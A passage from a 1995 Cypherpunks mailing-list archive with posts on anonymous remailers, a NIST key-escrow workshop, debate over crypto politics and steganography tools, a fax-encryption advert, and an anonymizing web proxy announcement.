encapsulate a message. No stuff "dangles outside" the remailed part. When PGP encryption is used, nothing is outside the block. If Alice sends something to Bob's Remailer, Bob decrypts the message and may or may not find further encrypted blocks inside. Envelopes within envelopes. I can't imagine it being done any other way. (I'm not counting the remailers possibly signing the sent messages, as a way of protecting against tampering, but this reveals nothing about the senders.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From unicorn at polaris.mindport.net Sun Sep 17 15:39:01 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 17 Sep 95 15:39:01 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <199509162015.AA03916@ideath.goldenbear.com> Message-ID: On Sat, 16 Sep 1995, Greg Broiles wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Black Unicorn writes: > > Some months ago I called for advanced stego and stealth PGP as well as > > larger keys in the event we all had to go "into the crypto closet" for a > > time. > > > I call for them again. > > I know of three ways to get software: > > 1. Write it yourself. I've admitted before I program as well as a carp. (No, not Mr. Carp) > 2. Pay someone else to write it. I don't think that e.g., a stealth PGP would demand much of a fee, or that such a fee would make many of the people involved in the various\ intellectual rights of the program happy. I might add that I don't want the software for myself, I want it for the effect it will have on potential legislation/enforcement. If some other 'punks want to get together and fund such projects, I will participate. However, putting the burden of financing this venture (which will have no immediate economic return, as I will support no venture which does not result in fully public software) entirely on my shoulders just because I happen to believe it will soon be necessary to maintain any strong crypto ability, is unrealistic, and I believe you know it. > 3. Find software someone else wrote that meets your needs. I'm working on 3, I don't believe it exists. > If (3) isn't working, perhaps you should try (1) or (2). > > (I've been "calling for" a big house with a hot tub for years now. > Still no progress. I'll let you know if it works out.) Cute, but that's about all. > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMFswPX3YhjZY3fMNAQHatwP/ZJKuNEDRPdCldyvshGkG/w/io+37zx3m > DyJ4h1+OicxYCtKbolXYVcX8C4d1j7hXY2sesepcDvYYyy+butdQ+/2tw3u0FW1j > WpfCGURpypBVb5T7QlL21Qv39cBIu9mJxkasPkQSeSnrC24eGtoItmZzrIRZgJyj > Dj2FOIfxiFY= > =5DwJ > -----END PGP SIGNATURE----- > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From shields at tembel.org Sun Sep 17 15:40:13 1995 From: shields at tembel.org (Michael Shields) Date: Sun, 17 Sep 95 15:40:13 PDT Subject: "Attachments" In-Reply-To: Message-ID: > Why do people keep sending "attachments"? > > This was just a text article, and not an application (program), so why was > it included as an "attachment"? It wasn't. It was a monopart MIME message of type application/pgp. Check your mailer config. -- Shields. From unicorn at polaris.mindport.net Sun Sep 17 15:40:51 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 17 Sep 95 15:40:51 PDT Subject: WAS_tem (fwd) In-Reply-To: <9509162012.AA29482@wu1.wl.aecl.ca> Message-ID: On Sat, 16 Sep 1995, S. Keeling wrote: > Incoming from Rev. Ben: > > > > On Thu, 14 Sep 1995, James A. Donald wrote: > > > > > If you draw a picture using paintbrush of an underage person engaging > > > in sexual conduct, you are in violation of this proposed legislation. > > > > Doesn't that directly contradict the stated purpose of existing child > [snip] > > > > Do the lawyers on the list want to pipe up? The current child pornography laws are entirely misguided and poorly written. > -- > > "Remember, obsolescence (Win95) isn't an accident; it's an art form!" > keelings at wu1.wl.aecl.ca s. keeling, aecl - whiteshell labs > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From futplex at pseudonym.com Sun Sep 17 15:46:06 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 17 Sep 95 15:46:06 PDT Subject: "Attachments" In-Reply-To: Message-ID: <9509172245.AA20150@cs.umass.edu> Tim May the Luddite ;) writes: [in response to Michael Shields' application/pgp message] > Why do people keep sending "attachments"? > > This was just a text article, and not an application (program), so why was > it included as an "attachment"? It's useful for those of us with MIME-enabled mailers, appropriately configured -- PGP is automatically launched to check the signature. It's not useful for others on the list, AFAIK. Pretty please, let's not have another MIME war; I think we drove Amanda Walker away permanently with the last one. Followups directed somewhere other than cypherpunks at toad.com. -Futplex From tedwards at Glue.umd.edu Sun Sep 17 15:55:14 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Sun, 17 Sep 95 15:55:14 PDT Subject: Friday's NIST Key Escrow FIPS Workshop Message-ID: I went to the NIST "Developing Key Escrow Encryption Standards Workshop" held in Gaithersburg, MD on Sept. 15, 1995. It turns out I know the guy who was running the conference so I knew I couldn't miss it...and I knew I had to wear my Cypherpunks t-shirt to show the flag (and it stood out, as there were few without suits there). I got to meet Dorothy Denning for the first time. I was mentioning how government key-escrow doesn't sound too bad to some in the libertarian/cypherpunk world, say for instance to ensure FOIA requests are not encrypted away. She said that would never be a problem, just getting the government to give you FOIA documents in the first place is the problem. In a nutshell, this was a conference to begin work on a FIPS for software key encryption escrow. Industry people there felt that a FIPS would be a great way to standardize key escrow for data recovery. However, except for one guy at IBM who said they tap employees phones alot, most industry people felt that it was not needed for tapping their real-time communications. There was a lot of talk from government people about the need for Law Enforcement to get access to encrypted real-time communication between government employees. This, to say the least, squicked many attendees, and there seemed to be much tension between the sides on that issue. I asked a couple of industry people and privacy advocates the question "Am I just paranoid, or is this FIPS a trial balloon for mandated civillian key escrow?" I got many "yes" answers. I also heard the occasional "this sounds like son-of-clipper" comments in the breakout groups. One noteworthy point is that RSA sent in a position paper to try to get the Digital Signature Standard replaced by RSA signatures for inclusion in key escrow FIPS due to its "virtual non-availability in commercial products," and noted that the US Govt. has free use of RSA sigs. Another noteworthy point is that NIST made clear that the key escrow FIPS should _not_ involve SECRET algorithms. The Workshop consisted of a discussion of goals and objectives by Ray Kammer (Deputy Director, NIST) and some initial thoughts on standards development by Miles Smid (NIST). Here is the gist of the overhead slides: The Goals of the workshop were based on the August 17 announcement by the Administration to allow for exportability of 64-bit software key escrow encryption, plans to allow Federal agencies to use Escrowed Encryption Standards compliant hardware devices for data communications, and the development of a FIPS for key escrow, implementable in software. This escrow FIPS would be used by Federal agencies in conjunction with FIPS-approved encryption techniques. This workshop was held to help begin the FIPS development. The workshop goals included 1) Providing input to the govt. on drafting a software key escrow encryption standard; 2) Helping govt. to identify additional policy and technical issues that need to be addressed and 3) providing the govt. with thoughts on drafting and follow-up The FIPS process involves developing the draft FIPS, a 90 day comment period, then addressing comments, and then it goes to the Secretary of Commerce for signature, and becomes effective six months after the signature. The purpose of the New Escrow FIPS is to foster a wider use of escrow technology...this means: no requirement for SECRET algorithms, software and hardware implementations, and exportability. It also will provide a government validation of escrow systems meeting the standard...theoretically allowing for security, integrity, and availability. Threats examined included compromise (unauthorized disclosure of keys and data recovery), and denial of service (modification or loss of keys, use of bogus recovery fields, and improper system operation). The FIPS will provide common formats and procedures which will facilitate data recovery and lower cost. Applicability of the FIPS will include the US Govt. and contractors. Applications include both stored and transmitted data. Encryption algorithms must be FIPS approved. And finally desirable features include: auditing, configuration control, backup capability, and efficiency. The questions asked to the breakout groups included: 1) Is a standard interface for the release of keys desirable? 2) What documentation is required? 3) How will operational procedures be developed? 4) How will conformance be validated? 5) Will security be evaluated? If so, under what criteria and by whom? 6) How will configuration control be maintained? 7) Are new FIPS-approved algorithms necessary? 8) Should escrowing be built into the Public Key Infracstructure? 9) Is a standard escrow system identification field needed? 10) Is split knowledge required? 11) Do systems which permit data to be encrypted for both storage and transmission need to provide for both kinds of escrow? 12) Does the government require special features (2-hour access, continuous real-time decryption, etc.)? From perry at piermont.com Sun Sep 17 16:21:04 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 17 Sep 95 16:21:04 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: Message-ID: <199509172320.TAA28220@frankenstein.piermont.com> Black Unicorn writes: > > > Some months ago I called for advanced stego and stealth PGP as well as > > > larger keys in the event we all had to go "into the crypto closet" for a > > > time. > > > > > I call for them again. > On Sat, 16 Sep 1995, Greg Broiles wrote: > > (I've been "calling for" a big house with a hot tub for years now. > > Still no progress. I'll let you know if it works out.) Black Unicorn writes: > Cute, but that's about all. I think the problem is that those of us in a position to build them don't really believe that they will solve the problem and thus are spending our time on other matters. Perry From unicorn at polaris.mindport.net Sun Sep 17 16:23:21 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 17 Sep 95 16:23:21 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: <199509171657.MAA26446@panix.com> Message-ID: On Sun, 17 Sep 1995, David C. Lambert wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Black Unicorn wrote: > > On Fri, 15 Sep 1995, David C. Lambert wrote: > > > > > BTW, I'm not for changing the name of the list, but I do see the logic > > > in a more establishment-friendly name to use when lobbying the public. > > > > Distrubute [sic] watered down cypherpunk "teachings" in more benign forms which > > hide their true (Ohhh! Scary!) potential in an effort to make them commonly > > acceptable to joe sixpack. > > I believe you misstate the point that people are trying to make. > > I haven't seen anyone advocating the "watering down" of any so-called > "teachings" to "hide" any "true potential". The only thing that people > have mentioned is that some of the less clueful out there have a knee > jerk response to the name "cypherpunk". That's all. I don't believe you can have one without the other. Tell me someone who is sensitive enough to be offended by the term "cypherpunk" won't be alarmed at concepts like crypto-anarchy. > > > Can't we all see what road this leads down? > > No. Please enlighten us. > When you begin compromising to meet the public sentiment you end up aiming for the middle. "He who builds on the people builds on mud." I believe this especially true in the United States. The general population has no tolerance/time/interest in the deeper issues involved here, and are much more apt to bow to the "law and order" arguments made by the various political entities here. These are emotional arguments to which Joe Sixpack is particularly open. Enter the four horsemen. I believe working to recruit "the people" and lobby "the leaders" to embrace the ramification of free and strong crypto is a losing game. My money in information futures is going into "yes" certificates on the question of "Unescrowed Strong Crypto Banned in U.S. by 2000." > > At the risk of politicizing the issue, I wouldn't be the first to call this > > "left-speak" or "term-sanitizing." > > And this matters because...? > The fact that you need this question answered does more to rebuke your position than I ever could. > > Really the core issue is that the citizens of their respective nations > > need to either: > > > > 1> See cryptography for the important individual rights issue that it > > is and latch on to the basic desire for free and unmonitored commerce and > > exchange without censorship or observation. > > > > or > > > > 2> Decide that they are not interested in the issues because these > > issues are too radical, or simply because their own political ideas > > fall left (or statist) of this spectrum. > > What exactly is it that you feel "the citizens of their respective > nations" are doing right now, if not this? Be real. What percentage of [insert nation here]'s citizens would be able to discuss strong encryption with anything more than a comic book understanding? i.e., the answer to your question is "mostly nothing." > > in the end I > > don't care if every joe sixpack on the planet uses real crypto, just so > > long as those I am to conduct commerce (of data or goods) with do. > > If this is the case, then I'm at a loss to understand how you fail to see > the merit in a "term-sanitizing", as you put it, in order to make the use > of strong crypto desired and required by Joe Sixpack. You're error is in assuming Joe Sixpack desires or thinks he requires strong crypto. How do you expect > the legality of string crypto to survive unless Joe and his friends exert > political pressure to keep it alive? I don't expect its legality to survive in the United States, nor do I expect it to survive despite "political pressure" (that nature of which which you conveniently do not idenfify) and finally, I don't expect Joe Sixpack, and his friends to exert any (undefined) political pressure- or care. If people want to try and organize a crypto awareness program, fine. If people want to try and organize a crypto propoganda program, count me out. If you don't understand the difference, you need to study history and political science. If Joe Sixpack can't deal with the core, unsanitized ramifications of strong crypto, Joe Sixpack isn't ready to have strong crypto. This is, in my view, realism, and intellectual evolution in action. If strong crypto is the advantage I suspect it will be, then those nations which use it will endow its citizens with those significant advantages, hopefully to the disadvantage of the banning nations. With any luck, this will result in the eventual lack of world/market infulence of crypto-ignorant Joe Sixpacks. This in my view is "a good thing." I would like the United States to be pro-crypto, but I'm not sure I give the country and its current political system as a whole that much credit. > Isn't it obvious that unless this > happens, that strong (unescrowed) crypto is on the path to being outlawed > (at least in the US, and several other countries)? > > > The final judgement will be in the advantage of velocity and security of > > transactions and the wealth that this "allocates" to those wise enough to > > adopt crypto exchange systems. Evolution in action. If this makes me > > elitist, so be it. > > Elitist or not, this is beside the point. No, it is exactly the point. > People are bringing up political > and rhetorical concerns because they feel that political and persuasive > methods are required *right now* in order to preserve the *legality* of > strong crypto. And I believe them a waste of time because I feel that political and persuasive methods are useless *right now* or in the *foreseeable future*. The only thing that will stop this legislation will be a sudden awakening of the American People to freedom of speech in the face of an offered and vague promise of "security." (Read: Good Luck) The FBI is screaming that strong crypto is nasty stuff to the Executive. Certainly the intelligence agencies are doing the same. The Executive is going to support if not outright push through a key forfeiture bill, and about all I can see standing in the way will be cost- which in this bill is going to be small. > I only care about whether Joe Sixpack wants strong crypto > because if I can't persuade him that he does, he won't help me keep it > legal in my country of residence. So if you are so intouch with Joe Sixpack, what does he think? Do you have some evidence to suggest that there is any widespread awareness of the issues among Joe and Jane? Surveys? Studies? Anything? Go out on the street and ask 10 random people. Hell, ask 10 intellectuals not in the computer science field. I think your level of disillusion will approach mine, and if not, then I do not give your powers of observation much credit. > Once it's legality seems safe(r) from > attack, he can go on using rot13 for all I care. I think you have a long wait. Part of the entire issue here is securing your own privacy rather than letting the government do it for you. By waiting for someone to TELL YOU that you are now ALLOWED to secure your own privacy, why are you any better than he who doesn't use strong crypto? Instead you should, while perhaps allocate some effort to political concerns, be working to propogate crypto systems which are untraceable, do not bear the recipiants key identifier in each message, and otherwise able to endure a crypto "Dark Age" which I see right around the corner here. In other words: Secure it yourself. Privacy comes to you only if you secure it yourself. If you believe that political action is the way to do this, be my guest- I happen to think you are wasting your time. Time will judge the winner of this debate in any event. I hope I am wrong, I expect I am not. > > David C. Lambert > dcl at panix.com > (finger for PGP public key) > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 [...] > -----END PGP SIGNATURE----- > > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jya at pipeline.com Sun Sep 17 16:25:53 1995 From: jya at pipeline.com (John Young) Date: Sun, 17 Sep 95 16:25:53 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <199509172325.TAA22254@pipe2.nyc.pipeline.com> Responding to msg by unicorn at polaris.mindport.net (Black Unicorn) on Sun, 17 Sep 6:39 PM >If some other 'punks want to get together and fund such >projects, I will participate. However, putting the >burden of financing this venture (which will have no >immediate economic return, as I will support no venture >which does not result in fully public software) What are the prospects of privacy-enhancing programing funded by contributors for non-commercial, non-governmental, "fully public software?" I would tithe, modestly but durably, to such work if I believed the promise. They call me Ishmael Sixpack. John Gilmore's (and others'?) underwriting toad is impressive. Along with the voluntary (?) effort of Hugh Daniels (and others, I don't know how toad survives). What else might be done cypherpunk-wise if material resources were available? And under what conditions and arrangements? The discussion of Mixmaster commercialization is instructive. And Julf's and the other remailers survivability and longevity in the face of attacks. How could the contributions be made without contaminating the product? No joke. Or, are only individually initiated and self-funded programs trustworthy, when all is said and done? And no planned program as rewarding as the eclectic irregulated. And bartering and bickering and rending and mending the only reputable method of exchange of the tumultuous souk. From pcw at access.digex.net Sun Sep 17 16:30:31 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 17 Sep 95 16:30:31 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: >>I saw "Hackers" yesterday. It's not bad and its political sensibility is >>very cyberpunk. The ad campaign even uses the tag line, "Their only crime >>is curiosity." > >It may not be a crime, but it's not nice to steal a title. Well, what do you think of my latest predicament. My first book, "Agents Unleashed" will be retitled "Agents At Large" because SAMS, a division of Viacom, considers any title ending with the word "unleashed" to be an infringement of their tradedress. They came up with enough legal mumbo-jumbo about trademark to scare my publisher into changing it. -Peter From unicorn at polaris.mindport.net Sun Sep 17 16:37:02 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 17 Sep 95 16:37:02 PDT Subject: planning for life during the crypto night (was Re: CYPHERPUNK considered harmful.) In-Reply-To: <20045.9509171928@exe.dcs.exeter.ac.uk> Message-ID: --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information On Sun, 17 Sep 1995 aba at atlas.ex.ac.uk wrote: > > Black Unicorn writes: > > > > 3. Unescrowed crypto banned, with advanced stego, panic passwords, > > stealth PGP, incorporated remailers all across international borders > > making offenders impossible to identify or catch. > > > > [...] I believe the goal is to propogate crypto far enough to at > > least have a salient "underground" participants. > > > > Some months ago I called for advanced stego and stealth PGP as well > > as larger keys in the event we all had to go "into the crypto > > closet" for a time. > > > > I call for them again. > > Guess you're saying that a future underground cypherpunk group is > going to need tools to continue if the US plummets into cryptographic > darkness. And you'd like to see these tools available now, as it will > be difficult to distribute, and set up if the big ban is already on > us. A pre-emptive safety precaution in the event that it happens. Precisely. Thank you. > > So what threat model do you envisage tools being needed to withstand? > Traffic analysis, jurisdiction, detection of encrypted data in stego'd files. I believe the basic problem will be one of avoiding detection and the ability to piggyback harmless looking files on "approved" encryption. In the event your encrypted message were detected, it would be nice if it didn't announce its intended destination via a public key header. I also believe that excessively large keys should be incorporated (2048/4096 bit RSA and 256 bit IDEA like encryption perhaps) to extend the likely useful life of cyphers which will be difficult to distribute later. I also would like to see applications which permit the user to select the from among a few types of encryption, in the event one is found to be broken. > A couple of the things you list are realisable with little effort, one > is a PGP with large keys, I am using a doctored to go to 16k keys [description of availability] > Adding stealth features to PGP, or even as standalone, aren't hard > either. I've been trying to add Hal's improved stealth algorithm to > Henry Hastur's stealth program. It's basically finished, except for > the problem that I am unsure about the security of the construct: Excellent! > So that's big key PGP, and stealth PGP. I'm presuming most people > figure 128 bit IDEA is suitably unassailable, I'm pretty confident in it, but I would like to see some others about. > What are views about creating Yet Another version of PGP. I've read a > few discussions of this kind of thing in the past on alt.security.pgp, > and most people were against it. But I think some useful things could > come out of it. I think one of the big hold ups is the wait for PGP 3.0 > > The other problem is working with pgp2.x when there is a version 3.0 > being worked on, not sure what stage 3.0 is at, any coding.. perhaps > if a stealth capable pgp2.x was worked on, and a few features > demonstrated, the 3.0 folks would be willing to take a look at it to > evaluate the features for possible version 3.0 inclusion. Exactly. > Good stego tools are the other main problem. I concur. > > My understanding is that all of the stego programs to date do it by > just ripping out the LSB of an audio or graphic image, and replacing > that with the bits from a message with a stealthed message. > As I understood the current implementation, stego is fairly easy to sniff out. Am I mistaken in this? > Sending masses of pictures around is kind of suspicious tho, I mean > several a day, each freshly scanned from what? I guess if video > conferencing gets here, it would be fun to add the stego into that > noisy stream, same for internet phone. Perhaps, but hardly as suspicious as sending naked random data. I think given hard to sniff stego, and the nationwide bandwidth, this is a non-issue. > Text stego, with bits hidden in the entropy of english text seems a > harder objective, but a useful one. Indeed. > I'm presuming that plausible deniability, and facilities for anonimity > are essentials. How does one go about doing that? Using newsgroups > to carry on a two level communication might be a good way of > maintaining plausible deniability. Either a stego interface to > remailers in other countries, so that the stego gateway to remailers > scans it's newspool, decrypts messages addressed to it, and forwards > that off to the anon remailers. The outcome could be a further text > or graphics stegoed message for posting to a suitably high noise news > group. The recipient is also scanning his news spool for stego > messages addressed to him. > > Sounds feasible. Perhaps a proof of concept would be easy to knock > up, if a place holder is inserted for the 'good text stego' program > should go. There was a 'texto' posted a while ago which did something > suitable. > > Adam I believe all these to be in everyone's best interest. From pcw at access.digex.net Sun Sep 17 16:39:14 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 17 Sep 95 16:39:14 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: in" -- this doesn't mean madonna stole it, does it? > >I'm reminded of the time a few years a go that there were two films in >release simultaneously named "Black Rain", and, most oddly, both took >place in Japan. > >Perry This is not as odd as you might think once you realize that the rain that fell after the atomic bombing was black. -Peter From sbryan at maroon.tc.umn.edu Sun Sep 17 16:47:09 1995 From: sbryan at maroon.tc.umn.edu (Steve Bryan) Date: Sun, 17 Sep 95 16:47:09 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: At 8:36 pm 9/16/95, Steven Levy wrote: >>I saw "Hackers" yesterday. It's not bad and its political sensibility is >>very cyberpunk. The ad campaign even uses the tag line, "Their only crime >>is curiosity." > >It may not be a crime, but it's not nice to steal a title. I suppose this means that when "Hackers" comes out on video there's no point in looking for a cameo appeareance of the author of the identically named book? From NSCEE at aurora.nscee.edu Sun Sep 17 17:16:34 1995 From: NSCEE at aurora.nscee.edu (NSCEE at aurora.nscee.edu) Date: Sun, 17 Sep 95 17:16:34 PDT Subject: FAX Encryption Software In-Reply-To: <43hun9$n2b@news1.deltanet.com> Message-ID: <9509180016.AA26906@aurora.nscee.edu> FYI: This was posted to a slew of Usenet newsgroups. Unless I've missed something, which "CRYPTO-STRONG" package has ever been "licensed" by the "U.S. Department of Commerce"? Does anybody have more info on this product or the good folks behind it? ===================================================================== Originally posted by: clav at deltanet.com >ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY >SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE??? > >Aliroo Ltd. has developed a Windows, eye-to-eye fax/email >encryption package called PrivaSoft. > >Unlike any previously devised system, this method protects, with >only 4 mouse clicks, fax and email transmissions in electronic >and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT >IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. > >You can encrypt a message, and then fax or email it (via plain >old standard fax machine or fax modem), print it to paper or save >to a disk file. > >It is fully licensed, without restriction for export, by the U.S. >Department of Commerce. NO PGP WORRIES. > >Email me for a free copy which will be sent to you via email or >snail mail post. It is fully functional (not crippleware) and >enables you to try our system out before purchase with 8 free >page scrambles. It retails for $130 per installed computer. >Looking for end users and distributors. > >Thanks, >David From jsimmons at goblin.punk.net Sun Sep 17 17:18:40 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Sun, 17 Sep 95 17:18:40 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: Message-ID: <199509180014.RAA00341@goblin.punk.net> > > On Sun, 17 Sep 1995, Black Unicorn wrote: > > So if you are so intouch with Joe Sixpack, what does he think? Do you > have some evidence to suggest that there is any widespread awareness of > the issues among Joe and Jane? Surveys? Studies? Anything? > > Go out on the street and ask 10 random people. Hell, ask 10 > intellectuals not in the computer science field. I think your level of > disillusion will approach mine, and if not, then I do not give your > powers of observation much credit. > Actually, I think it's even worse than that. I dropped by the weekly 'meeting' of the Cal Poly SLO Computer Club (OK, these are the locally notorious slo.punks, and the meeting is more of a social get together than anything) last Monday night. I was interested in getting people's reactions to having a large number of people's anon.penet IDs publicly posted. What I found was kind of scary. No one was aware of the existence of any other remailers than anon.penet. Everyone assumed that the University is logging all mail to anon.penet, and no one particularly cared. One woman asked me why she should use PGP when it could be so quickly broken. Turns out (I am NOT making this up) she didn't know the difference between PGP and ROT_13! Knowledge of security was limited to the technical details of setting up systems such as Kerberos and firewalls and not using your SSN for a password. No one had any idea of the algorithms involved, or which ones are truly secure and which ones can be easily broken. Etc. These are all undergraduates in the process of getting BSCS degrees. -- Jeff Simmons jsimmons at goblin.punk.net From s675570 at aix2.uottawa.ca Sun Sep 17 17:37:11 1995 From: s675570 at aix2.uottawa.ca (s675570 at aix2.uottawa.ca) Date: Sun, 17 Sep 95 17:37:11 PDT Subject: Joe Sixpack and his TV Message-ID: If Mr. & Mrs J. Sixpack seem to know zilch at present about strong or any other other kind of crypto, would it maybe, possibly have to do with a lack of exposure to it on the soap operas of their favorite media, ie TV? Hmmm. The general level of paranoia on X-Files (100 milion viewers all over the world, rabid internet following) is even higher than on this list, and the usual discussions on this list would read like a free vacation to their scriptwriters and researchers. Anyone have any scriptwriting skills? 100 million potential subscribers to toad are stake... (Yes I guess then we'd have to move to usenet distribution. But think how entertaining our flames wars would become. Yes I'm definitely calling for it, and the big house with the hot tub would be nice too. Only half joking. Honestly though, anyone want to find out their email addreses and send out a gratis subscription to toad? A script would be nice too. It's better exposure than five seconds of Tim with Connie Chung.) From rah at shipwright.com Sun Sep 17 17:58:26 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 17 Sep 95 17:58:26 PDT Subject: Joe Sixpack and his TV Message-ID: >(...It's better exposure >than five seconds of Tim with Connie Chung.) Connie: "So it's really true that you're an anarchist? That you believe that semi-*automatic weapons* and strong *cryptography* should be *freely* available to *everyone*? and that strong cryptography on a *public* network like the *internet* will bring about the collapse of nation states all over the *world*?" Tim: "Yes." Connie: "But, what about *democracy*? What the will of the *people*?" Tim: "What about them?" A little more than 5 seconds, but I believe that captures her inflection pretty nicely, don't you think? Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From perry at piermont.com Sun Sep 17 18:12:24 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 17 Sep 95 18:12:24 PDT Subject: Joe Sixpack and his TV In-Reply-To: Message-ID: <199509180112.VAA28385@frankenstein.piermont.com> It also captures Tim nicely. I'll point out, though, that exchanges like that can be handled properly or badly. Doing it right means answering truthfully but in a way that explains your position rather than alienating the audiance. When you have time to answer questions like that (TV isn't a medium suitable for this) the right way to answer the last one is to do something like referencing Thoreau. By the way, I like the opening of Civil Disobediance so much I thought I'd post it. I heartily accept the motto, "That government is best which governs least"; and I should like to see it acted up to more rapidly and systematically. Carried out, it finally amounts to this, which also I believe--"That government is best which governs not at all"; and when men are prepared for it, that will be the kind of government which the will have. Perry Robert Hettinga writes: > >(...It's better exposure > >than five seconds of Tim with Connie Chung.) > > Connie: "So it's really true that you're an anarchist? That you believe that > semi-*automatic weapons* and strong *cryptography* should > be *freely* available to *everyone*? and that strong > cryptography on a *public* network like the *internet* will > bring about the collapse of nation states all over the > *world*?" > > Tim: "Yes." > > Connie: "But, what about *democracy*? What the will of the *people*?" > > Tim: "What about them?" > > A little more than 5 seconds, but I believe that captures her inflection > pretty nicely, don't you think? From unicorn at polaris.mindport.net Sun Sep 17 18:19:52 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 17 Sep 95 18:19:52 PDT Subject: Joe Sixpack and his TV In-Reply-To: Message-ID: On Sun, 17 Sep 1995 s675570 at aix2.uottawa.ca wrote: > If Mr. & Mrs J. Sixpack seem to know zilch at present about strong or any > other other kind of crypto, would it maybe, possibly have to do with a lack > of exposure to it on the soap operas of their favorite media, ie TV? Hmmm. > > The general level of paranoia on X-Files (100 milion viewers all over the > world, rabid internet following) is even higher than on this list, and > the usual discussions on this list would read like a free vacation to their > scriptwriters and researchers. Anyone have any scriptwriting skills? > 100 million potential subscribers to toad are stake... (Yes I guess then > we'd have to move to usenet distribution. But think how entertaining our > flames wars would become. Yes I'm definitely calling for it, and the big > house with the hot tub would be nice too. Only half joking. Honestly though, > anyone want to find out their email addreses and send out a gratis > subscription to toad? A script would be nice too. It's better exposure > than five seconds of Tim with Connie Chung.) > As I understand it shows like "The X-Files" don't accept unsolicited scripts. Not surprising as I'm sure they have writer's agreements. --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From dl at hplyot.obspm.fr Sun Sep 17 18:57:46 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Sun, 17 Sep 95 18:57:46 PDT Subject: Anonymous WWW proxy Alpha release available Message-ID: <9509180157.AA13253@hplyot.obspm.fr> -----BEGIN PGP SIGNED MESSAGE----- If you are interested, the first (alpha) version of my anonymous httpd proxy is available see htpp://hplyot.obspm.fr:6661/ (where it runs, unless it dies meanwhile, then see htpp://hplyot.obspm.fr/~dl/wwwtools.html oor mail me) Ok, what does it do more than cern's : + It's single process, light, and mostly multi-tasking + It removes all nasty 'personal' infos like user-agent, referer,... + If there is an "ProxyControl: V1 " in the header, it will send the request to first the the first proxy listed in the list and sending to that one a "ProxyControl: V1 " header + If you launch your personnal copy of the AnonProxyHttp with arguments "port 2 ph1:pp1 ph2:pp2 ph3:pp3" and setenv http_proxy http://localhost:port/ accessing the web now goes through your AnonProxy, which randomly creates a route to your url going through 2 of the 3 specified other AnonProxy What will come when i'll have some time : + more flexibility in the spec of the other AnonProxies and a centralized and/or distributed catalog of availble proxies What I need folks for : + get it and run it (and debug?), so we could chain them :-) What is the big catch/problem : + its written in .... Tcl + tcl-dp + tclX ! (plz don't flame me...) so you need a tcl-dp+tclX interp to try it locally... Feedback / Comments / ... welcome Regards dl - -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAgUBMFzRIXk52/beodHxAQFGzAP+Kl4ImRpuYIjSk7rtEjGIoPVSv1d1j6sq 9GIgmFgRLSyiw2LcYzlFNxtEOqAjM2k+rJttHxavKOJb+eeAzqZP7ihWHfBv8FS3 56SiCw16h2OPsEeZ4TOkUmMTEGDWHJKN9tfVac4qpuG1LZ7A2RejMAUV9qp02LNg Vch5aDWlPNc= =AvS/ -----END PGP SIGNATURE----- From acollier at crl.com Sun Sep 17 18:59:49 1995 From: acollier at crl.com (acollier at crl.com) Date: Sun, 17 Sep 95 18:59:49 PDT Subject: FAX Encryption Software In-Reply-To: <43hvft$n2b@news1.deltanet.com> Message-ID: 